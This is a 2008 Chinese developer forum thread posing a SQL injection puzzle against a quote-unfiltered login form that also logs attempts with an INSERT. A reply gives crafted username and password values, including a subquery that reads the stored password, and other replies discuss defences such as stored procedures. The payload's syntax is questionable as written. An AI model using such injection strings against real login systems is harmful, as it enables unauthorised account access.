某网站登陆入口,有正确的用户名,但忘密码了,已知没有过滤单引号,可以注入,但发现在登陆时还会用insert记录登陆的用户
验证登陆的SQL语句大致如下(VBscript语法): "select * from user_table where username='" & username & "' and password='" & password & "'"
插入登陆信息SQL语句大致如下: "insert into login_table(username,password,login_date) values('" & username & "',' & password & "',getdate())"

现在你的任务是如何构造一个username和password,既能通过登陆验证也能通过登陆信息记录

两条一起好像不行哦....

username = "正确的用户名' OR 1 = 1"
password = "select * from user_table where username = '正确的用户名'"

刚才写错了，应该如下：
username = "正确的用户名"
password = "' + select password as password from user_table where username = '正确的用户名' + '"

解释
构造后的两语句为：
select * from user_table where username='正确的用户名' and password='' + select password as password from user_table where username = '正确的用户名' + ''

insert into login_table(username,password,login_date) values('" & username & "','' + select password as password from user_table where username = '正确的用户名' + '',getdate())

这样，将密码转变为了依据用户名从user_table表中获取，两头构造两个空字符串连接起来。这两个空字符串的其中一个单引号由两个语句提供了。

收到的鲜花

• 三断笛 于 2008-11-25 18:42 送鲜花  20朵   附言：我很赞同

呵呵 强悍啊 学习了。。。

铲铲果然厉害。不过要是用存储过程而不是语句的话，这种注入就应该可以被杜绝了。

厉害厉害，学习了。。。。。。

呵呵,又学了一招,不过现在很多都不直接用SQL语句了,呵

那可不一定哦。只要这种方式存在，任何程序的实现，在设计时都可能会考虑到这些方式。

我现在就不能断言，我所有的数据库访问都通过DataSet。因为DataReader尤其性能优异的一面，因此进行详细设计时，这两种访问数据库的方式都可能会考虑

[[it] 本帖最后由 铲铲 于 2008-11-27 17:04 编辑 [/it]]

但是如果读取数据不再使用DataSet 和DataReader了呢??
也就是说整个项目中都不出现Sql语句了,像这样的情况还可能发生吗??还望赐教..